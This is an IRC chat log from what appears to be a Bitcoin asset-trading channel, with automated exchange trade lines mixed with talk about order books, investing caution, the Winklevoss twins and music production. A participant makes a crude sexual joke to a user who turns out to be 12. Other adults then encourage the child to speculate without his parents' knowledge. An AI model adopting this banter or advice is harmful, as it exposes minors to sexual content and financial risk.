[S.MPOE] 606 @ 0.00070442 = 0.4269 BTC [+] May 18 12:00:31 [BTCTC] [TAT.ASICMINER] 432 @ 0.019896 = 8.5951 BTC [+] May 18 12:01:27 [BTCTC] [TAT.ASICMINER] 100 @ 0.01999 = 1.999 BTC [+] May 18 12:03:41 [BTCTC] [TAT.ASICMINER] 40 @ 0.02 = 0.8 BTC [+] May 18 12:03:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.02 = 0.2 BTC [+] May 18 12:04:07 [BTCTC] [TAT.ASICMINER] 190 @ 0.02 = 3.8 BTC [+] May 18 12:06:11 [BTCTC] [TAT.ASICMINER] 390 @ 0.02 = 7.8 BTC [+] May 18 12:07:52 [BTCTC] [TAT.ASICMINER] 9 @ 0.02 = 0.18 BTC [+] May 18 12:08:36 [BTCTC] [TAT.ASICMINER] 12 @ 0.02 = 0.24 BTC [+] May 18 12:11:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.02 BTC [+] May 18 12:12:02 [HAVELOCK] [ASICM] 37 @ 0.02 = 0.74 BTC [-] May 18 12:14:42 [BTCTC] [TAT.ASICMINER] 10 @ 0.02 = 0.2 BTC [+] May 18 12:16:01 [HAVELOCK] [HIM] 2 @ 1.8502 = 3.7004 BTC [-] May 18 12:18:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.02 = 0.1 BTC [+] May 18 12:19:15 2.08. Silly people. May 18 12:19:33 [BTCTC] [TAT.ASICMINER] 383 @ 0.02 = 7.66 BTC [+] May 18 12:19:39 [MPEX] [S.MPOE] 6394 @ 0.00070442 = 4.5041 BTC [+] May 18 12:19:41 [MPEX] [S.MPOE] 14206 @ 0.00070443 = 10.0071 BTC [+] May 18 12:21:02 [HAVELOCK] [HIM] 3 @ 1.8502 = 5.5506 BTC [-] May 18 12:22:02 [HAVELOCK] [ASICM] 100 @ 0.0201 = 2.01 BTC [+] May 18 12:27:36 [BTCTC] [TAT.ASICMINER] 4 @ 0.020196 = 0.0808 BTC [+] May 18 12:27:54 [BTCTC] [S.DICE-PT] 2 @ 0.0028 = 0.0056 BTC [+] May 18 12:30:28 [BTCTC] [TAT.ASICMINER] 24 @ 0.020196 = 0.4847 BTC [+] May 18 12:33:17 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19 BTC [-] May 18 12:47:17 [BTCTC] [COGNITIVE] 2 @ 0.234999 = 0.47 BTC [+] May 18 12:52:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.019791 = 0.1979 BTC [-] May 18 12:52:57 [BTCTC] [TAT.ASICMINER] 13 @ 0.01979 = 0.2573 BTC [-] May 18 12:58:44 [MPEX] [S.MPOE] 2900 @ 0.00070443 = 2.0428 BTC [+] May 18 13:04:15 [BTCTC] [ASICMINER-PT] 9 @ 2.079999 = 18.72 BTC [-] May 18 13:07:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.020195 = 0.202 BTC [+] May 18 13:07:52 [BTCTC] [TAT.ASICMINER] 50 @ 0.020196 = 1.0098 BTC [+] May 18 13:18:18 [BTCTC] [TAT.ASICMINER] 6 @ 0.020196 = 0.1212 BTC [+] May 18 13:21:00 How come my order wwas fulfilled at the same time as I placed it? May 18 13:21:34 when would youi have liked it to be fulfilled ? May 18 13:22:03 lol May 18 13:22:11 before? May 18 13:24:34 haha. May 18 13:25:08 But I thought you actually needed to find someone to sell it to you? May 18 13:25:09 the legacy of mtgox May 18 13:25:17 Well, for them to find someone. May 18 13:25:36 Maybe because I made a bid higher than the last. May 18 13:25:42 I'm confused. May 18 13:26:20 ahah we need a bash. May 18 13:26:32 kakobrekla ^ May 18 13:29:05 [BTCTC] [ASICMINER-PT] 2 @ 2.07999 = 4.16 BTC [-] May 18 13:31:24 WILLdude, have you been trading in asset markets before? May 18 13:32:26 i think he's learning. May 18 13:32:44 I'm learning, experimenting with small amounts. May 18 13:33:02 [HAVELOCK] [ASICM] 50 @ 0.0201 = 1.005 BTC [+] May 18 13:33:05 OK, I'll try to help, although I'm hesitant to lead more lambs to the slaughter. May 18 13:33:31 [BTCTC] [TAT.ASICMINER] 70 @ 0.020196 = 1.4137 BTC [+] May 18 13:33:46 First of all, the money you have now... Forget that you have it. It is gone and you will lose it. Just think to yourself that those are monopoly money that just caught fire. May 18 13:34:13 You will not stand a chance, and if you accept that initially, you'll get a lot further. May 18 13:35:18 Second, the asset markets work like this... There are two sides to every deal, just like in real life. There are bids, which are essentially people saying "I am willing to buy X shares for Y amount each". Then there are the asks, which are people saying "I have X amount of shares that I am willing to sell for Y amount each". May 18 13:35:20 um May 18 13:36:05 If you think of this like a normal store, on the market, you are both the store owner and the customer, depending on whether you want to buy or want to sell. May 18 13:36:36 furuknap: So basically I should just treat it as a football bet with an extremely unreliable friend? So I should think that I probably won't get anything whatsoever back? May 18 13:36:48 When you walk into the market, all the asks are people saying "you can buy from me at these prices". If you bid an amount that is higher than any of these people, that trade goes through. May 18 13:37:07 Ah right. May 18 13:37:33 On the flip side, when you want to sell, you join the people, saying "I want this amount for my shares". If someone then comes in and says "I want to pay more than X for shares" then your shares are sold to them. May 18 13:38:20 I get that now. May 18 13:38:21 wow, a n00b getting helpful advice in this chan, see something new every day:) May 18 13:38:31 Simplified, it is a lowest price first for asks, and highest price first for bids. In other words, if there are people in the market buying and willing to pay more than you then their bids are filled first if there is someone willing to sell. May 18 13:38:58 This makes a lot more sense. May 18 13:39:00 Conversely, if there is someone willing to sell at a lower price than you and someone comes in to buy then their sales are done before yours. May 18 13:39:20 One more question. What are PT-shares? May 18 13:39:28 There is a third thing here, which is extremely vital. May 18 13:39:44 DO NOT BUY ANY SHARE YOU DO NOT FULLY UNDERSTAND. May 18 13:39:44 Right May 18 13:39:55 [BTCTC] [ASICMINER-PT] 3 @ 2.07999 = 6.24 BTC [-] May 18 13:40:11 I see. So make sure I understand what the fund does? May 18 13:40:18 Do you know how to fully evaluate the value of the share you have chosen? May 18 13:40:22 yeah, people keep buying my shares :) May 18 13:40:25 Dividends, stability. May 18 13:40:31 furuknap: What do you mean? May 18 13:40:58 If not, you do not buy. You sit down, you relax, you realize that good investments will be around for a long time, and the extremely profitable investments take a lot of time to find and understand. May 18 13:41:59 Okay. May 18 13:42:07 Should I sell what I have? May 18 13:42:14 I'm guessing you are rushing to get some Asicminer shares right now. Chill down for a bit and learn what makes ASICMiner a good deal. Understand how their revenues are generated. Understand where the dividends come from. Understand their expenses and market. May 18 13:42:30 Only you can decide whether to sell or buy. May 18 13:42:39 Yeah, that's true. May 18 13:43:12 You should listen to only one person and that is you. The herd is not a good indicator, nor are anyone giving you advice in either direction. May 18 13:43:17 I need to read up or ask about it more than i have. May 18 13:43:28 You do. May 18 13:44:07 Unless, of course, you enjoy the pain of losing money, in which case, just buy whatever has a nice ring to it and hope for the best. May 18 13:45:07 I guess I'm panicking. May 18 13:45:41 And predicting the price will go sky high soon and never come down to what it has been previously. May 18 13:45:49 Yes, you are, and that's usually when you lose money. There's no rush. There are plenty of great companies that will be around for a long time. AM may or may not be one of them, but you need to figure that out for yourself. May 18 13:47:04 Yeah. May 18 13:47:04 The added benefit of this exercise is that even if you find out that you should have rushed in right now, by waiting and learning, you will be better next time, and there will be many next times. May 18 13:47:05 Ooh May 18 13:48:26 I think I kinda just need to stop being so optimistic about stuff. May 18 13:48:48 Optimistic is fine. Desperate is not. May 18 13:50:57 All this stuff seems hell to try and understand. May 18 13:51:12 I think I'll ride with my 6 shares for a few weeks. May 18 13:51:45 Thanks for saving me a shitload of money and disappointment. May 18 13:52:16 *and saving me from disappointment. May 18 13:52:31 [BTCTC] [ASICMINER-PT] 1 @ 2.07999 BTC [-] May 18 13:52:50 I may also have cost you a shitload of money and caused disappointment, but if you just calm down, at least you'll be informed in the end. May 18 13:53:27 Yeah May 18 13:53:29 Just take a walk, have a beer, fuck that nice girl down at the library, and while you're there, pick up a book on investing. Don't forget to read it. May 18 13:54:16 Uhm. Options 2,3 are a bit illegal. May 18 13:54:31 [BTCTC] [ASICMINER-PT] 1 @ 2.07999 BTC [-] May 18 13:54:38 In that case, I really, really suggest you wait until it's legal. May 18 13:55:08 what's illegal !? May 18 13:55:20 [BTCTC] [TAT.ASICMINER] 94 @ 0.020196 = 1.8984 BTC [+] May 18 13:55:24 https://en.wikipedia.org/wiki/Age_of_consent May 18 13:55:25 Beer and sex. I'm guessing... May 18 13:56:37 how old are you will? May 18 13:56:40 ya well in that case don't sweat it. May 18 13:57:03 good to be learing about this sort of thing young, even if you dont de well, you will learn May 18 13:57:16 [BTCTC] [TAT.ASICMINER] 11 @ 0.020196 = 0.2222 BTC [+] May 18 13:57:37 12.85 May 18 13:57:52 you're twelve ?! May 18 13:58:21 well, dont risk more than you can afford to lose, btc can break or the exchagne can be robbed, there is always a risk you lose everything May 18 13:58:55 mircea_popescu: 12.85 May 18 13:59:45 but iirc you used to sign in with a wikipedia/W-D cloak. how'd you get that ? May 18 14:01:57 I still do, don't I? May 18 14:02:01 [HAVELOCK] [ASICM] 100 @ 0.0201 = 2.01 BTC [+] May 18 14:02:20 mircea_popescu: Take a wild guess at how I got one? May 18 14:04:06 no, not atm. May 18 14:04:19 as far as you know you don't get project cloaks unless the project assigns them. May 18 14:05:07 Yeah, they did. May 18 14:05:36 I used to do a lot of wikipedia ing May 18 14:05:38 http://en.wikipedia.org/wiki/User:W.D. May 18 14:06:01 wikipedia, run by 12 year olds :/ May 18 14:06:17 you're an almost 13yo with a history on wikipedia ? teh wow. May 18 14:06:30 so how's school like ? May 18 14:07:00 [BTCTC] [ASICMINER-PT] 3 @ 2.07999 = 6.24 BTC [-] May 18 14:07:18 [BTCTC] [ASICMINER-PT] 1 @ 2.07999 BTC [-] May 18 14:07:54 Shit May 18 14:08:07 I'm failing at pretty much everything. May 18 14:09:16 you actually in highschool ? May 18 14:10:48 My sister has become a prefect now, and she obviously has a lot more aptitude than I. May 18 14:10:55 Yes. May 18 14:10:59 Of course. May 18 14:11:01 Year 8 May 18 14:11:06 um May 18 14:11:19 [BTCTC] [ASICMINER-PT] 1 @ 2.079999 BTC [+] May 18 14:11:23 don't you have to be 14-15 to start hs ? May 18 14:11:49 Well, I thought that by high school you were referring to secondary education in general. May 18 14:12:09 he will go to eyar 12 May 18 14:12:13 [BTCTC] [ASICMINER-PT] 12 @ 2.079999 = 24.96 BTC [+] May 18 14:12:17 year 1 is 17-18 May 18 14:12:17 im mostly familiar with this system whereby kids go to school around 7, complete 4 years or primary, then 4 years of jr high then 4 years of hs May 18 14:12:19 12* May 18 14:12:21 then college/university May 18 14:12:23 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [+] May 18 14:12:43 In the uk, there are 3 types of school in general. May 18 14:13:03 in this paradigm primary education is everything up to and including high school. secondary education is college/university degree May 18 14:13:15 [BTCTC] [TAT.ASICMINER] 20 @ 0.020196 = 0.4039 BTC [+] May 18 14:13:17 Infant, Junior, Secondary (college is not compulsary) May 18 14:13:33 aha. and secondary is the last 8 years ? May 18 14:13:49 [BTCTC] [ASICMINER-PT] 1 @ 2.081 BTC [+] May 18 14:13:50 seconday in englad is last 6 right? May 18 14:14:14 We have in infant school Year R, Year 1, Year 2. May 18 14:14:25 aaanyway, these technicalities aside, i think you're the youngest guy here by a fat margin. good for you. May 18 14:14:37 yeah, im also impressed May 18 14:14:46 not only btc, but btc assets May 18 14:14:51 In juniors, there is year 3 through 6 May 18 14:14:56 but be careful, do not risk more than you are willing to lose 100% of May 18 14:15:05 Secondary 7 through 11 May 18 14:15:10 College 11 and 12 May 18 14:15:13 Chaang-Noi well what's he going to lose, his ferrari / May 18 14:15:26 My ferrari? May 18 14:15:45 WILLdude don't worry about it. lose everything every other week. what diff does it make. May 18 14:15:47 i doubt it, but $200 might be massive to him. no idea May 18 14:15:55 its just good advice, never to risk more than you can lose 100% of May 18 14:16:13 Chaang-Noi iirc 50 was impressive to him, but honestly, if there is an age where you should be taking risks on your capital it's 12. May 18 14:16:24 next week you get more pocket money and you can try again. May 18 14:16:37 eventually you figure it out and you have what, 20 years' advantage on everyone else. May 18 14:16:48 i agree he should take risks, however, he should be aware that he can lose everything he risks, and be ready to accept that May 18 14:17:14 yes starting out young is good, i started investing in gold and stocks when i was 10 May 18 14:17:42 My parents have no clue. May 18 14:18:03 well, nothing wrong with learning and trying stuff out, but really trust no one, lots of scammers as well May 18 14:18:16 look up escrow if you dont know how to sue it May 18 14:18:19 WILLdude no parents ever have any clue. if they did they'd not be parents. May 18 14:18:28 lol May 18 14:18:36 no kids for you eh? May 18 14:18:46 that aside, they often have a point. May 18 14:19:34 Chaang-Noi maybe when i'm a little older, build a harem get the girls knocked up May 18 14:19:39 have 6 a year or something. May 18 14:20:00 one way to do it i guess May 18 14:24:19 [BTCTC] [ASICMINER-PT] 3 @ 2.081 = 6.243 BTC [+] May 18 14:24:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.020196 = 0.101 BTC [+] May 18 14:26:19 [BTCTC] [ASICMINER-PT] 1 @ 2.081 BTC [+] May 18 14:26:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.020196 BTC [+] May 18 14:27:14 [BTCTC] [ASICMINER-PT] 1 @ 2.081 BTC [+] May 18 14:29:37 no i started work young May 18 14:29:56 i started full time work (8 hour days or longer) when i was 12 and had holiday from school May 18 14:30:16 also mostly my gifts for bdays or christmas was just money, and i used it to invest, not buy toys May 18 14:30:31 it can be done if your family, or good friends own the company May 18 14:30:41 leggally you can do it at 14 in the usa May 18 14:30:46 12 or 13 well.. shh :) May 18 14:30:59 [BTCTC] [ASICMINER-PT] 2 @ 2.087 = 4.174 BTC [+] May 18 14:31:25 so what did you do ? May 18 14:31:38 my first job was to make boxes May 18 14:32:03 i worked at a neon sign plant, and made boxes for them to put the signs in May 18 14:32:21 boxes were light and i got to use a high powered stapel gun :) May 18 14:32:57 [BTCTC] [TAT.ASICMINER] 81 @ 0.020196 = 1.6359 BTC [+] May 18 14:33:00 yeah i started young and have worked hard in the past, had a company that did well and really did a lot of investing, i will enver have to work again (unless i do something stupid) May 18 14:33:24 parents did not own that company, fried of the family, but yeah, i guess they trusted me. just seemed normal at the time May 18 14:34:02 yes May 18 14:34:14 we are a hard working bunch, not really caring about govt regulations :/ May 18 14:35:24 my family has never given me anything other than the opertunity to work/learn May 18 14:36:15 i got an offer at free university but i declined, other than that, no money other than modest gifts for bday and christmas, the like May 18 14:36:42 one they die, i kind of think i will be getting some massive stuff, but that will be held for my kids when i die May 18 14:37:42 2 or 3 May 18 14:37:45 have 1 May 18 14:38:42 yes, started a company, sold it to amazon then went to school May 18 14:39:11 was in no hurry to go right away May 18 14:39:18 still not sure why i even went May 18 14:39:32 other than the pussy... May 18 14:39:41 do or die May 18 14:40:09 16 to 20 hours days for like 2 years May 18 14:40:21 but in the end it worked out, however for a while.. not so sure May 18 14:40:41 i am honestly shocked im not dead May 18 14:41:22 [BTCTC] [ASICMINER-PT] 1 @ 2.087 BTC [+] May 18 14:42:52 of all the shit iv done, and none of them killing me, well the odds are not in my favour but some how im still here May 18 14:42:54 luck May 18 14:45:20 https://bitcointalk.org/index.php?topic=204375.0 bfl mining, lol May 18 14:45:42 motorcycleing in thailand on mountians drunk is part of it yes May 18 14:46:39 yes May 18 14:47:02 https://blockchain.info/nodes-globe May 18 14:47:05 source May 18 14:47:06 [BTCTC] [TAT.ASICMINER] 20 @ 0.020196 = 0.4039 BTC [+] May 18 14:47:24 [MPEX] [S.MPOE] 5799 @ 0.00070264 = 4.0746 BTC [-] May 18 14:47:57 been around for years May 18 14:48:51 [BTCTC] [ASICMINER-PT] 1 @ 2.087 BTC [+] May 18 14:49:10 [BTCTC] [ASICMINER-PT] 1 @ 2.087 BTC [+] May 18 14:49:13 massive power in china now May 18 14:49:47 wonder if its clipse :) May 18 14:54:28 i just finished 3 porck choops May 18 14:54:32 pork May 18 14:54:39 [BTCTC] [TAT.ASICMINER] 24 @ 0.020196 = 0.4847 BTC [+] May 18 14:54:40 but no beer :/ May 18 14:55:08 [BTCTC] [ASICMINER-PT] 1 @ 2.087 BTC [+] May 18 14:55:59 wife just brought it up to my office, dont think i would ahve ordred that May 18 14:56:24 it is May 18 14:56:55 [MPEX] [S.MPOE] 751 @ 0.00070264 = 0.5277 BTC [-] May 18 14:57:05 [BTCTC] [ASICMINER-PT] 3 @ 2.08795 = 6.2639 BTC [+] May 18 14:58:59 khao sow gai May 18 14:59:05 My fav. group from S. Africa https://www.youtube.com/watch?feature=player_embedded&v=JWKmEqKaX0w May 18 14:59:24 [BTCTC] [ASICMINER-PT] 1 @ 2.08795 BTC [+] May 18 15:00:39 [BTCTC] [TAT.ASICMINER] 65 @ 0.020196 = 1.3127 BTC [+] May 18 15:00:42 [BTCTC] [ASICMINER-PT] 3 @ 2.088 = 6.264 BTC [+] May 18 15:03:41 [BTCTC] [ASICMINER-PT] 4 @ 2.089 = 8.356 BTC [+] May 18 15:04:02 [HAVELOCK] [SDICE] 7 @ 0.2449 = 1.7143 BTC [+] May 18 15:04:03 [HAVELOCK] [SDICE] 11 @ 0.245 = 2.695 BTC [+] May 18 15:05:02 [HAVELOCK] [SDICE] 7 @ 0.245 = 1.715 BTC [+] May 18 15:05:02 [HAVELOCK] [SDICE] 9 @ 0.25 = 2.25 BTC [+] May 18 15:10:02 [HAVELOCK] [SDICE] 8 @ 0.25 = 2 BTC [+] May 18 15:12:02 [HAVELOCK] [ASICM] 492 @ 0.0201 = 9.8892 BTC [+] May 18 15:12:39 [BTCTC] [TAT.ASICMINER] 37 @ 0.020196 = 0.7473 BTC [+] May 18 15:14:17 [BTCTC] [TAT.ASICMINER] 16 @ 0.0225 = 0.36 BTC [+] May 18 15:17:01 [HAVELOCK] [ASICM] 35 @ 0.0201 = 0.7035 BTC [+] May 18 15:17:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.022511 = 0.0675 BTC [+] May 18 15:18:01 [HAVELOCK] [ASICM] 122 @ 0.0201 = 2.4522 BTC [+] May 18 15:18:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.020021 = 0.2002 BTC [-] May 18 15:18:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.02002 = 0.4004 BTC [-] May 18 15:25:57 [BTCTC] [PAJKA.BOND] 1 @ 0.1035 BTC [-] May 18 15:27:23 [BTCTC] [PAJKA.BOND] 2 @ 0.1033 = 0.2066 BTC [-] May 18 15:39:01 [HAVELOCK] [ASICM] 100 @ 0.020111 = 2.0111 BTC [+] May 18 15:41:01 [HAVELOCK] [ASICM] 1 @ 0.020111 BTC [+] May 18 15:43:44 [BTCTC] [BASIC-MINING] 2 @ 0.49 = 0.98 BTC [+] May 18 15:44:49 [BTCTC] [ASICMINER-PT] 3 @ 2.089 = 6.267 BTC [+] May 18 15:45:20 [BTCTC] [ASICMINER-PT] 5 @ 2.0899 = 10.4495 BTC [+] May 18 15:45:39 [BTCTC] [ASICMINER-PT] 13 @ 2.09 = 27.17 BTC [+] May 18 15:46:34 [BTCTC] [TAT.ASICMINER] 17 @ 0.0225 = 0.3825 BTC [+] May 18 15:47:56 [BTCTC] [TAT.ASICMINER] 15 @ 0.02099 = 0.3149 BTC [-] May 18 15:50:16 [MPEX] [S.MPOE] 244 @ 0.00070443 = 0.1719 BTC [+] May 18 15:50:17 [MPEX] [S.MPOE] 2376 @ 0.00070544 = 1.6761 BTC [+] May 18 15:50:36 [BTCTC] [ASICMINER-PT] 5 @ 2.09 = 10.45 BTC [+] May 18 15:51:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.020989 = 0.2099 BTC [-] May 18 15:51:42 [BTCTC] [TAT.ASICMINER] 18 @ 0.02099 = 0.3778 BTC [+] May 18 15:53:52 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [-] May 18 15:54:01 [HAVELOCK] [ASICM] 231 @ 0.020111 = 4.6456 BTC [+] May 18 16:03:01 [HAVELOCK] [ASICM] 3 @ 0.02022 = 0.0607 BTC [+] May 18 16:03:22 [BTCTC] [TAT.ASICMINER] 41 @ 0.020799 = 0.8528 BTC [-] May 18 16:03:57 [BTCTC] [ASICMINER-PT] 2 @ 2.08 = 4.16 BTC [-] May 18 16:05:46 [BTCTC] [S.DICE-PT] 500 @ 0.00279 = 1.395 BTC [-] May 18 16:06:52 [BTCTC] [TAT.ASICMINER] 4 @ 0.020799 = 0.0832 BTC [-] May 18 16:09:01 [BTCTC] [TAT.ASICMINER] 15 @ 0.020799 = 0.312 BTC [-] May 18 16:11:28 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [-] May 18 16:12:24 [BTCTC] [TAT.ASICMINER] 19 @ 0.020799 = 0.3952 BTC [-] May 18 16:14:46 [BTCTC] [ASICMINER-PT] 1 @ 2.08 BTC [-] May 18 16:18:21 [BTCTC] [TAT.ASICMINER] 7 @ 0.02075 = 0.1453 BTC [-] May 18 16:19:57 https://bitcointalk.org/index.php?topic=173433.msg2189311#msg2189311 May 18 16:20:02 lol the forum is chugging right along May 18 16:20:35 [BTCTC] [ASICMINER-PT] 1 @ 2.07 BTC [-] May 18 16:20:39 [BTCTC] [ASICMINER-PT] 1 @ 2.060001 BTC [-] May 18 16:21:20 [MPEX] [S.MPOE] 2624 @ 0.00070544 = 1.8511 BTC [+] May 18 16:21:22 [MPEX] [S.MPOE] 15157 @ 0.00070576 = 10.6972 BTC [+] May 18 16:21:25 [BTCTC] [ASICMINER-PT] 1 @ 2.0522 BTC [-] May 18 16:21:31 [BTCTC] [TAT.ASICMINER] 10 @ 0.020103 = 0.201 BTC [-] May 18 16:22:01 [HAVELOCK] [ASICM] 2 @ 0.0204 = 0.0408 BTC [+] May 18 16:22:12 [BTCTC] [TAT.ASICMINER] 20 @ 0.020102 = 0.402 BTC [-] May 18 16:22:35 [BTCTC] [TAT.ASICMINER] 20 @ 0.0201 = 0.402 BTC [-] May 18 16:22:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.020026 = 0.2003 BTC [-] May 18 16:23:18 [BTCTC] [TAT.ASICMINER] 45 @ 0.020025 = 0.9011 BTC [-] May 18 16:26:15 "Principality of Freedonia is a “new country” project based in Houston, Texas; founded in March of 1992 by the 13 year-old John Alexander Kyle and a group of his friends." May 18 16:26:17 gee. May 18 16:26:41 wat May 18 16:27:05 [BTCTC] [ASICMINER-PT] 1 @ 2.012201 BTC [-] May 18 16:28:30 [BTCTC] [ASICMINER-PT] 1 @ 2.0122 BTC [-] May 18 16:28:57 [BTCTC] [ASICMINER-PT] 4 @ 2.08 = 8.32 BTC [+] May 18 16:29:36 the higher AM goes, the faster people buy May 18 16:30:54 "Operation Atlantis was a project, headed by Werner Stiefel, developed with the intent of establishing a libertarian country on international waters. The operation set out to do this by launching a ferro-cement boat into the Hudson River in December 1971 which was piloted into an area near the Bahamas. After reaching its destination it eventually sank in a hurricane" May 18 16:31:04 im researching greyhawk's list of independent countries. May 18 16:35:31 [BTCTC] [ASICMINER-PT] 1 @ 2.075 BTC [-] May 18 16:36:13 ok wtf is this shit http://postimg.org/image/zetr3l6rt/ May 18 16:36:56 kakobrekla box of fandom. May 18 16:37:05 this is what bfl does :D May 18 16:37:13 [BTCTC] [ASICMINER-PT] 9 @ 2.087876 = 18.7909 BTC [+] May 18 16:37:26 [BTCTC] [ASICMINER-PT] 1 @ 2.088 BTC [+] May 18 16:37:55 bfl will ruin btc May 18 16:38:11 cant they mine butterfly coins and leave britney alone May 18 16:40:20 ya but they failed May 18 16:41:22 its now the winklevoss turn May 18 16:41:25 http://news.cnet.com/8301-13578_3-57585151-38/winklevoss-twins-on-bitcoin-time-to-work-with-the-feds May 18 16:42:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.0199 = 0.398 BTC [-] May 18 16:43:11 [BTCTC] [TAT.ASICMINER] 10 @ 0.020661 = 0.2066 BTC [+] May 18 16:43:15 https://twitter.com/Mircea_Popescu/status/335752314696634369 May 18 16:43:28 and i have no idea why the winkledoods think anyone asked them. May 18 16:44:04 [BTCTC] [ASICMINER-PT] 1 @ 2.087951 BTC [-] May 18 16:44:34 [BTCTC] [TAT.ASICMINER] 95 @ 0.020662 = 1.9629 BTC [+] May 18 16:45:57 mircea_popescu but they are the kool kids May 18 16:47:00 [BTCTC] [S.DICE-PT] 100 @ 0.002551 = 0.2551 BTC [-] May 18 16:47:06 kakobrekla 1. not even a 3.14 supernodule ; 2. no tall hot chick. May 18 16:47:13 [BTCTC] [S.DICE-PT] 4 @ 0.00255 = 0.0102 BTC [-] May 18 16:47:17 :> May 18 16:47:17 [BTCTC] [S.DICE-PT] 1 @ 0.00254 BTC [-] May 18 16:47:21 [BTCTC] [S.DICE-PT] 118 @ 0.002515 = 0.2968 BTC [-] May 18 16:47:25 [BTCTC] [S.DICE-PT] 231 @ 0.0025 = 0.5775 BTC [-] May 18 16:47:54 (they kinda look like the schwarzenegger twins, tbh) May 18 16:48:01 [HAVELOCK] [HIM] 3 @ 1.8502 = 5.5506 BTC [-] May 18 16:48:16 [BTCTC] [S.DICE-PT] 240 @ 0.0025 = 0.6 BTC [-] May 18 16:53:08 [BTCTC] [TAT.ASICMINER] 55 @ 0.02075 = 1.1413 BTC [+] May 18 16:53:54 [MPEX] [S.MPOE] 4450 @ 0.00070435 = 3.1344 BTC [-] May 18 16:57:02 [HAVELOCK] [ASICM] 65 @ 0.0204125 = 1.3268 BTC [+] May 18 16:57:17 they want to be the ceo of bitcoin to get back at mark May 18 16:58:18 lol May 18 16:59:13 mircea, we must stop this madness May 18 16:59:33 no but seriously. a coupla rowers who made some failed website, were part of a failed lolsuit and otherwise what exactly ? guest of a guest ? May 18 16:59:44 bitcoin gets more freakshow than tv. May 18 16:59:47 supernode wannabes May 18 17:00:24 fo real. at least the pietila guy was funny. May 18 17:02:18 i suppose next some pickup-artist and entrepreneur is going to show up and be all max keiser all over everything. May 18 17:02:26 ;;google famous pickup artist May 18 17:02:27 25 World's Greatest Pick Up Artists - The Modern Savage: ; Pickup artist - Wikipedia, the free encyclopedia: ; The Game: Penetrating the Secret Society of Pickup Artists - Wikipedia: (1 more message) May 18 17:02:46 let's run a #bitcoin-assets pool. everyone pick his horse May 18 17:02:57 mircea, you should sign up up to mystery's and matador and styles exchange May 18 17:02:58 whoever's shows up first supernoding all around wins. May 18 17:03:11 can we do it in #bitcoin-ass instead and use donkeys May 18 17:03:20 KRS-1 ok! May 18 17:03:24 =D May 18 17:03:28 but i'm not there, you'll ahve to rely my pick May 18 17:03:30 brb reading list May 18 17:03:41 robert greene smokes them all tho May 18 17:03:51 Neil Strauss May 18 17:03:59 he' okey May 18 17:04:09 mystery is just a clown May 18 17:04:09 my money's on neil being the next bitcoin ceojesus May 18 17:04:18 nah, mystery May 18 17:04:22 you're on. May 18 17:04:33 and im publishing this. May 18 17:04:39 haha :) May 18 17:04:45 1btc bet? May 18 17:05:14 you actually want to piss away money on something as stupid as "who is the next idiot who thinks he's as important to bitcoin as bitcoin is to his empty life" ? May 18 17:05:42 [BTCTC] [TAT.ASICMINER] 51 @ 0.02075 = 1.0583 BTC [+] May 18 17:06:30 wasted btc on worse things May 18 17:06:41 alrighty, 1 btc. how do we escrow ? May 18 17:06:57 or how does this get handled ? May 18 17:07:12 ahh, i'm sure the honor system will do May 18 17:07:16 its all logged May 18 17:07:22 suggestion: each send the other 1 BTC to hold in case you lose. You can escrow each other May 18 17:07:40 its only 1btc May 18 17:07:40 haha okay. May 18 17:07:48 oh and I can look after the fee if you like May 18 17:08:11 who are you blehg ? May 18 17:08:15 so its mystery vs styles? May 18 17:08:23 yeah so far. May 18 17:08:37 not sure how well this will scale if more ppl get involved but what the heck. May 18 17:08:51 if we weren;t out here causing trouble how would the bitcoin go up up up ? May 18 17:08:58 maybe need to pick 2 more mainstram douches May 18 17:09:03 mp: I'm not around much, normally logged in as aknap3, but not at that terminal right now May 18 17:09:11 like bill o reilly and kanye west May 18 17:09:43 BitHub nah, it's always freaks & failures that make the loud noises. May 18 17:09:54 a la winklevoss and venesses and whatnot. May 18 17:10:06 sherm? May 18 17:10:57 has to be new. only noobs are clueless enough to go "you Sir, are a SNIOP." at MPOE-PR May 18 17:12:35 [BTCTC] [ASICMINER-PT] 1 @ 2.085 BTC [-] May 18 17:12:36 [MPEX] [S.MPOE] 4539 @ 0.00070435 = 3.197 BTC [-] May 18 17:14:41 [BTCTC] [TAT.ASICMINER] 24 @ 0.02075 = 0.498 BTC [+] May 18 17:15:56 should bet on first pop rapper to feature bitcoin in a music video....or song? May 18 17:16:10 i have a rapper i work with May 18 17:16:16 he;s not famous May 18 17:16:25 i will say will.i.am May 18 17:16:26 but planning on a song May 18 17:16:28 hehe May 18 17:16:34 "bitcoin in my bamk" May 18 17:16:36 bank* May 18 17:16:38 or somesuch May 18 17:16:44 zhoutonnged May 18 17:16:46 nice tat, i use to produce for some latino rappers :) May 18 17:16:56 haven't talked to them aboutbitcoin songs yet May 18 17:17:24 album woulod be done already if I hadnt gotten myself so wrapped up int bitcoin May 18 17:17:38 you produce too tat? May 18 17:17:42 mpc? May 18 17:18:11 yeah, May 18 17:18:16 i have a bunch of gizmos May 18 17:18:21 maschine May 18 17:18:24 kb May 18 17:18:30 ahh nice by native instruments May 18 17:18:42 i use all their vst''s vsti's etc May 18 17:18:50 well use to May 18 17:19:00 before bitcoin i was a manicly doing music May 18 17:19:08 in spare time May 18 17:19:19 yeah intresting, like to hear some sometime May 18 17:19:31 i barely have enough time for my "real" job now May 18 17:19:34 nevermind music May 18 17:20:07 juggling my life May 18 17:20:20 some balls gotta drop May 18 17:20:47 im tryint to encourage artists to sell their mp3,s vids etc for bitcoin May 18 17:21:37 i am trying to rethink the way indie artists/labels work May 18 17:21:47 selling mp3s is a non-starter imo May 18 17:22:09 that's actually where the ThickAsThieves name came from May 18 17:22:14 mp3s is 